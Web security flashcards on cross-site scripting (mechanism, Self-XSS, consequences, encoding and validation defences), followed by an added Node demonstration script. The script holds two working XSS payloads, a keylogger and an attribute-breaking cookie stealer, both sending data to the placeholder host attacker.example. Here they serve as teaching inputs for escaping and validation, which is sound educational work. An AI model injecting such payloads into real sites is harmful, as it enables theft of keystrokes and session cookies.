Web Security Flashcards

1
Q

What is Cross-Site Scripting (XSS) and how does it work?
(5)

What is a subtype of XSS?

A

XSS is a code injection attack that lets an attacker run malicious JavaScript in another user's browser.
The attacker does not target the victim directly.
The attacker exploits a vulnerability in a website that the victim visits: the site writes untrusted input into its pages without encoding it.
The website itself delivers the malicious JavaScript to the victim.
Because it is served as part of the page, the script runs with the site's origin and appears to be a legitimate part of the website.
The payload reaches the page either reflected from the request (e.g. a URL parameter) or stored in the site's data (a comment, a profile field); a separate SQL injection flaw is one way to plant it in stored content, but ordinary input fields are the usual route.

Subtype: Self-XSS. No flaw in the site is needed; the attacker uses social engineering to trick the victim into running attacker-supplied JavaScript in their own browser (e.g. by pasting it into the developer console or the address bar).

2
Q

Name three consequences of Cross-Site Scripting attacks.

A
  1. Cookie theft: read document.cookie and send it to an attacker-controlled server (cookies flagged HttpOnly are not readable this way, which is why the flag matters).
  2. Key logging: register a keydown handler with addEventListener and exfiltrate each keystroke.
  3. Phishing: insert a fake login form into the page using DOM manipulation; it appears on the legitimate site's origin, so the user has no reason to distrust it.
3
Q

What are two methods of preventing XSS?

A
  1. Encoding (output escaping) = escapes untrusted data at the point where it is written into the page, so the browser interprets it only as data, never as code. The encoding must match the context (HTML body, attribute value, JavaScript string, URL), since each context has different special characters.
  2. Validation = filters or rejects user input that does not match what the field is expected to contain (an allow-list of characters or formats, or for rich text an allow-list of safe HTML elements), so that nothing the site later renders can carry script. Validation is a second layer and does not replace encoding.
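The following is an added example, not part of the original flashcards, showing in code what cards 1 and 3 describe: a comment template that concatenates untrusted input into HTML (so the site itself delivers the attacker's script), the same template with output encoding, and an allow-list validator. The card 2 keylogger is used as the stored payload. It runs under Node with no dependencies; the render functions are hypothetical stand-ins for a site's template, all inputs are constructed, and attacker.example is a placeholder host.

```javascript
// Added example, not from the flashcards. Shows how an XSS payload travels
// through the site's own HTML to the victim (card 1) and how output encoding
// and input validation stop it (card 3). All inputs are constructed;
// attacker.example is a placeholder host and the render functions are
// hypothetical stand-ins for a site's comment template.

// The keylogger from card 2, submitted as a "comment". A vulnerable site
// stores it and later serves it to every visitor as part of the page.
const KEYLOGGER_PAYLOAD =
  '<script>document.addEventListener("keydown",' +
  'e=>fetch("https://attacker.example/?k="+e.key))</script>';

// An attribute-context payload: closes the quoted value attribute and adds an
// event handler. No "<" is needed, so filters that only strip tags miss it.
const ATTR_PAYLOAD =
  '" onfocus="fetch(\'https://attacker.example/?c=\'+document.cookie)" autofocus="';

// VULNERABLE: untrusted values are concatenated straight into the markup, so
// the browser cannot tell the attacker's script from the site's own HTML.
function renderCommentVulnerable(author, text) {
  return `<div class="comment"><input value="${author}"><p>${text}</p></div>`;
}

// Encoding: replace the characters that carry meaning in HTML with entities,
// so the browser treats the value as data. This table is safe for element
// content and for double-quoted attribute values; JavaScript and URL contexts
// need their own encoders.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// FIXED: every untrusted value is encoded where it is written into the page.
function renderCommentSafe(author, text) {
  return `<div class="comment"><input value="${escapeHtml(author)}">` +
    `<p>${escapeHtml(text)}</p></div>`;
}

// Validation: for a field with a known shape, accept only an allow-list and
// reject everything else, rather than trying to strip "bad" characters.
function isValidUsername(name) {
  return /^[A-Za-z0-9_-]{3,20}$/.test(name);
}

// Crude check used only to show the difference: does the rendered HTML still
// contain a script tag or an injected on* event handler attribute?
function containsActiveMarkup(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=/i.test(html);
}

// Runs each payload through both templates and the validator.
function runDemo() {
  return {
    vulnerableStored: containsActiveMarkup(renderCommentVulnerable('alice', KEYLOGGER_PAYLOAD)),
    safeStored: containsActiveMarkup(renderCommentSafe('alice', KEYLOGGER_PAYLOAD)),
    vulnerableAttr: containsActiveMarkup(renderCommentVulnerable(ATTR_PAYLOAD, 'hi')),
    safeAttr: containsActiveMarkup(renderCommentSafe(ATTR_PAYLOAD, 'hi')),
    payloadRejectedByValidation: !isValidUsername(ATTR_PAYLOAD),
  };
}

console.log(runDemo());
```

Run it with `node xss_demo.js`: the two `vulnerable*` entries come back true, both `safe*` entries false, and the attribute payload fails validation. Note that `escapeHtml` only covers HTML body and double-quoted attribute contexts; data written into a `<script>` block, an inline event handler, or a URL needs the encoder for that context, which is why a templating engine with context-aware auto-escaping is the practical choice. The validator rejects rather than sanitizes, so a rejected value never reaches the template at all.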